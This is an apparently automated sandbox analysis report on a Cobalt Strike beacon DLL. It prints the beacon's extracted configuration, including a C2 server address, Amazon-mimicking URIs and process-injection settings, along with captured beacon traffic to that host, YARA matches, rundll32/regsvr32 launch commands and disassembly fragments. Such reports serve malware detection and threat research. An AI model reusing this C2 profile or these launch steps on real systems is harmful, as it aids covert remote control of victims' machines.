Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp |
Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 8082, "SleepTime": 38500, "MaxGetSize": 1399607, "Jitter": 27, "C2Server": "20.104.209.69,/broadcast", "HttpPostUri": "/1/events/com.amazon.csm.csa.prod", "Malleable_C2_Instructions": ["Remove 1308 bytes from the end", "Remove 1 bytes from the end", "Remove 194 bytes from the beginning", "Base64 decode"], "SpawnTo": "16nKFaB/gr/TtjAg2jiqFg==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 1670873463, "bStageCleanup": "True", "bCFGCaution": "True", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 16700, "ProcInject_PrependAppend_x86": ["kJCQ", "Empty"], "ProcInject_PrependAppend_x64": ["kJCQ", "Empty"], "ProcInject_Execute": ["ntdll.dll:RtlUserThreadStart", "SetThreadContext", "NtQueueApcThread-s", "kernel32.dll:LoadLibraryA", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "False", "HostHeader": ""} |
Source: unknown |
Network traffic detected: HTTP traffic on port 49685 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49685 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49686 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49686 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49687 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49687 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49688 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49688 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49689 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49689 |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /1/events/com.amazon.csm.csa.prod HTTP/1.1Accept: */*Origin: https://www.amazon.comx-amz-rid: MTI4NDQwODUyNAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Content-Length: 14246Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Trojan_Raw_Generic_4 Author: FireEye |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Rule for beacon reflective loader Author: unknown |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown |
Source: 8082-x86.dll, type: SAMPLE |
Matched rule: CobaltStrike_Resources_Artifact32_v3_14_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/artifact32{.dll,.exe,big.exe,big.dll,bigsvc.exe} signature for versions 3.14 to 4.x and resources/artifact32svc.exe for 3.14 to 4.x and resources/artifact32uac.dll for v3.14 and v4.0, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 888bae8d89c03c1d529b04f9e4a051140ce3d7b39bc9ea021ad9fc7c9f467719 |
Source: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Sleeve_Beacon_Dll_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s sleeve/beacon.dll Versions 4.3 and 4.4, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, rs2 = 78a6fbefa677eeee29d1af4a294ee57319221b329a2fe254442f5708858b37dc, hash = 51490c01c72c821f476727c26fbbc85bdbc41464f95b28cdc577e5701790845f |
Source: 00000000.00000003.435119690.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: 00000000.00000003.435119690.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: 00000000.00000003.436145653.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: 00000000.00000003.436145653.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: 00000000.00000003.435087941.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: 00000000.00000003.435087941.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: 00000000.00000003.581071660.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: 00000000.00000003.581071660.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: 00000000.00000003.511799758.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: 00000000.00000003.511799758.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: 00000000.00000002.620198943.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: 00000000.00000002.620198943.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Sleeve_BeaconLoader_VA_x86_o_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s sleeve/BeaconLoader.VA.x86.o (VirtualAlloc) Versions 4.3 through at least 4.6, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1 |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13 |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13 |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23 |
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23 |
Source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR |
Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\8082-x86.dll" |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x86.dll |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllGetClassObject |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllMain |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllRegisterServer |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1 |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x86.dll |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllGetClassObject |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllMain |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllRegisterServer |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1 |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE71FA push ss; ret |
0_3_00CE720F |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE13E7 push FFFFFFC0h; ret |
0_3_00CE13F3 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CEB4DA push esi; ret |
0_3_00CEB4DD |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CEB59F push esi; retf |
0_3_00CEB59E |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CEB59F push esi; iretd |
0_3_00CEB5FE |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CEB556 push esi; retf |
0_3_00CEB59E |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE0527 push FFFFFF99h; ret |
0_3_00CE0533 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE06D9 push eax; ret |
0_3_00CE06E6 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE166C pushfd ; ret |
0_3_00CE1672 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE4668 push edi; ret |
0_3_00CE4677 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE0634 push eax; ret |
0_3_00CE063D |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE07CD push ecx; ret |
0_3_00CE07D4 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE07C4 push ecx; ret |
0_3_00CE07CB |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE17DE push edx; ret |
0_3_00CE17EF |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE078D push ecx; ret |
0_3_00CE0797 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE179A pushfd ; ret |
0_3_00CE17B3 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE07BB push ecx; ret |
0_3_00CE07C2 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_3_00CE0756 push ecx; ret |
0_3_00CE0764 |
Source: C:\Windows\System32\loaddll32.exe |
